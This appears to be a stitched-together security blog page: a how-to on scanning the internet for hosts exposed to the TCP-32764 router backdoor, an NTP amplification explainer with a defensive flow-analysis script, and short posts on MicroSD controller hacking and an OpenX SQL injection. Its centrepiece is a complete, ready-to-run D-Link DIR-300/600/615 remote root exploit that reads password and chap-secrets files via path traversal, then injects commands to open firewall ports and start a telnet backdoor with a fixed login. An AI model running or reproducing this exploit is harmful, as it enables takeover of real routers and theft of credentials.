[HOWTO] Searching the internet for the TCP-32764 netgear exploit

This is a backdoor disclosed last month. You can find it on GitHub.
Here, I'll describe a quick and dirty way to search the internet for hosts exposed to this exploit.

This exploit allows complete control of the affected host. You can download/upload files, get a root shell, PPPoE credentials, admin password, etc.

The idea was originally posted here; however, that post didn't describe how to do it, so I'll write a very quick post on how to do it.

DISCLAIMER: educational purposes only. Use at your own risk. I only wrote the minimalist bash script and the how-to.

Some more info from the author of the exploit.

Probable source of the backdoor:

Backdoor LISTENING ON THE INTERNET confirmed in:

  • Linksys WAG120N (@p_w999)
  • Netgear DG834B V5.01.14 (@domainzero)
  • Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 (issue 44)
  • Netgear WPNT834 (issue 79)
  • OpenWAG200 maybe a little bit TOO open 😉 (issue 49)

Backdoor confirmed in:

Backdoor may be present in:


D-Link DIR-300, DIR-600, DIR-615 (fw 4.0) remote root exploit

This is a remote root exploit for D-Link wireless routers DIR-300 (all versions), DIR-600 (all versions), DIR-615 (fw 4.0).

Have fun!

#!/bin/sh

# usage banner
if [ -z "$1" ]; then
    echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
    echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
    echo "usage: $0 [router address] [telnet port]";
    exit 0;
fi;

# telnet port, default 3333
if [ -z "$2" ]; then
    TPORT=3333;
else
    TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
    L=`echo $HTTPASSWD | cut -d' ' -f1`;
    P=`echo $HTTPASSWD | cut -d' ' -f2`;

    echo "found username: $L";
    echo "found password: $P";

    curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null;

    if [ $? -eq 0 ]; then
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

        echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
        curl -sS "http://$1/logout.php" 1>/dev/null;
    fi
fi

CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`;

if [ ! -z "$CHAP" ]; then
    echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

NTP based DDoS attack – understanding NTP reflection

Behind a reflection attack

A reflection attack works when an attacker can send a packet with a forged source IP address. The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet “from” a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet. Until recently the most popular protocol for amplification attacks was DNS: a small DNS query looking up the IP address of a domain name would result in a large reply.

[Figure: NTP DDoS Amplification Attack]

For DNS the amplification factor (how much larger a reply is than a request) is 8x. So an attacker can generate an attack 8x larger than the bandwidth they themselves have access to. For example, an attacker controlling 10 machines with 1Gbps could generate an 80Gbps DNS amplification attack.

In the past, we’ve seen one attack that used SNMP for amplification: it has a factor of 650x! Luckily, there are few open SNMP servers on the Internet and SNMP usually requires authentication (although many are poorly secured). That makes SNMP attacks relatively rare.
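The amplification factor the post talks about is also the signal a defender can look for in flow data: for a reflector/victim pair, bytes leaving the service port dwarf the bytes that arrived at it. The following is an added example (not code from the original post) that computes that reply/request byte ratio per server, client and service from NetFlow-style records and flags pairs that look amplified. The record layout, the sample flows, the IP addresses and the thresholds are all constructed assumptions for illustration.

```python
"""Spot reflection/amplification traffic in unidirectional flow records.

Added example, not code from the original post. It assumes NetFlow-style
records shaped as (src_ip, dst_ip, proto, sport, dport, packets, bytes);
the sample records, IPs and thresholds below are constructed for illustration.
"""
from collections import defaultdict

# Constructed sample flows (not captured traffic). A reflector at 192.0.2.10
# answers a legitimate client, then answers a flood of spoofed requests that
# claim to come from the victim 203.0.113.7.
SAMPLE_FLOWS = [
    # legitimate NTP exchange: request and reply are about the same size
    ("10.0.0.5",    "192.0.2.10", "udp", 40001, 123, 1, 76),
    ("192.0.2.10",  "10.0.0.5",   "udp", 123, 40001, 1, 76),
    # reflection: 400 small requests "from" the victim, 40,000 large replies to it
    ("203.0.113.7", "192.0.2.10", "udp", 40002, 123, 400, 23_200),
    ("192.0.2.10",  "203.0.113.7", "udp", 123, 40002, 40_000, 19_200_000),
    # an ordinary DNS lookup for contrast (reply is larger, but tiny in volume)
    ("10.0.0.5",    "192.0.2.53", "udp", 51000, 53, 1, 60),
    ("192.0.2.53",  "10.0.0.5",   "udp", 53, 51000, 1, 200),
]

# UDP services the post names as reflectors (DNS, SNMP, NTP)
SERVICE_PORTS = {53: "dns", 123: "ntp", 161: "snmp"}


def amplification_ratios(flows):
    """Return {(server, client, service): (bytes_from_server, bytes_to_server, ratio)}.

    bytes_to_server is what the client side sent to the service port;
    bytes_from_server is what the service port sent back to that client.
    Flows where both ports are service ports are ambiguous and are skipped.
    """
    to_server = defaultdict(int)
    from_server = defaultdict(int)
    for src, dst, proto, sport, dport, _pkts, nbytes in flows:
        if proto != "udp":
            continue
        if dport in SERVICE_PORTS and sport not in SERVICE_PORTS:
            to_server[(dst, src, SERVICE_PORTS[dport])] += nbytes
        elif sport in SERVICE_PORTS and dport not in SERVICE_PORTS:
            from_server[(src, dst, SERVICE_PORTS[sport])] += nbytes
    ratios = {}
    for key, out_b in from_server.items():
        in_b = to_server.get(key, 0)
        # replies with no matching request at all are the strongest signal
        ratio = out_b / in_b if in_b else float("inf")
        ratios[key] = (out_b, in_b, ratio)
    return ratios


def flag_amplification(flows, min_ratio=5.0, min_bytes=1_000_000):
    """List (server, client, service, ratio) pairs whose reply volume is large
    and whose reply/request byte ratio looks like amplification.

    The thresholds are assumptions for this example; tune them to the link."""
    flagged = []
    for (server, client, svc), (out_b, _in_b, ratio) in amplification_ratios(flows).items():
        if out_b >= min_bytes and ratio >= min_ratio:
            flagged.append((server, client, svc, round(ratio, 1)))
    return flagged


def attack_bandwidth_bps(machines, bps_per_machine, factor):
    """Traffic reaching the victim: attacker bandwidth times the amplification
    factor (the post's case: 10 machines x 1 Gbps x 8 = 80 Gbps)."""
    return machines * bps_per_machine * factor


if __name__ == "__main__":
    for server, client, svc, ratio in flag_amplification(SAMPLE_FLOWS):
        print(f"{svc}: {server} -> {client} amplification ~{ratio}x")
    print(f"{attack_bandwidth_bps(10, 1e9, 8) / 1e9:.0f} Gbps at the victim")
```

On the constructed sample the legitimate NTP exchange scores a ratio of 1, the DNS lookup about 3.3 on a few hundred bytes, and only the reflector-to-victim pair is flagged, at roughly 828x. The byte threshold matters as much as the ratio: a single large DNS reply is normal, while megabytes of replies to a host that sent almost nothing is not.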

The new kid on the block today is NTP.

Hacking MicroSD cards

You should read the latest on hacking MicroSD cards by Bunnie Studios (http://www.bunniestudios.com/blog/?p=3554).

Some points to consider:

  • Every card has an ARM microcontroller;
  • Flash is usually bad, but it doesn't go to waste: a 16GB card with 80% bad flash can be sold as a 2GB one;
  • Remember point 1? That microcontroller can allow arbitrary code execution.
[Figure: MicroSD Card controller]

Interested on reading more?

This is the whole write-up – http://bunniefoo.com/bunnie/sdcard-30c3-pub.pdf – and here's the whole video. Enjoy!

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1

The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable to a SQL injection attack that allows attackers to gain backend access. The vulnerability is actively being exploited.

Read more about it here.